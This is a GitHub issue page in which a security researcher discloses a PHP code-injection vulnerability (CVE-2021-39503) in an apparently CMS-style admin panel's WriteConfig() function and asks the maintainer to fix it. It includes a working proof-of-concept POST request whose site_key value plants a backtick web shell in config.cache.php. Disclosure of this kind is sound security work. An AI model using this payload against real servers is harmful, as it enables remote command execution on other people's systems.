Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

PHP Code Execution via WriteConfig() function #15

Open
KietNA-68 opened this issue Aug 22, 2021 · 1 comment
Open

PHP Code Execution via WriteConfig() function #15

KietNA-68 opened this issue Aug 22, 2021 · 1 comment

Comments

@KietNA-68
Copy link

KietNA-68 commented Aug 22, 2021
edited
Loading

#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Submit date: 22/08/2021
#Condition: Admin user
#Version: v5.6
#Description:
Becase of filtered input without "<, >, ?, =, `,...." In WriteConfig() function, the attacker can inject php code to /include/config.cache.php file. The attacker can append ?> to close php syntax and adding new php function

In /admin/site_save.php file
image

image

WriteF() function:
image

###PoC:
image

In config.cache.php file

image

Then back to .php files in /admin/ directory to execute code
image

###Request

POST /admin/site_save.php HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: http://172.16.0.12:2222
Connection: close
Referer: http://172.16.0.12:2222/admin/site_add.php
Cookie: PortalOpenEMR=BKEx0ZLJ9X41gReq-UHNt-aC0jHNPiQLUOf7FXckqCAumudg; OpenEMR=UwreHaTw9iqwJWXqAY3%2CWYkZgvA3wdVmymdC5QqiVC1H2scM; loader=loaded; admin_lang=cn; home_lang=cn; workspaceParam=users_index%7CMember; referurl=%2Findex.php%3Fm%3Duser%26c%3DUsers%26a%3Dcentre; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; users_id=1; PHPSESSID=qhclrgdoah7rbv9l34fvj07h00
Upgrade-Insecure-Requests: 1

site_name=123&site_key=kietna?><?=`$_GET[0]`?><?&site_lang=testtest&webname=123&weburl=http%3A%2F%2F172.16.0.12%3A2222&webpath=123&webswitch=Y&action=add

###Response

HTTP/1.1 200 OK
Date: Sun, 22 Aug 2021 07:54:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12942

<script type="text/javascript">window.top.location.reload();</script>
@KietNA-68 KietNA-68 changed the title PHP Code Execution via create new site function in site_save.php PHP Code Execution via WriteConfig() function Aug 22, 2021
@KietNA-68
Copy link
Author

KietNA-68 commented Aug 26, 2021
edited
Loading

CVE-2021-39503 assigned for me and [email protected]
please fix it ASAP! thank you very much @duyueping

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@KietNA-68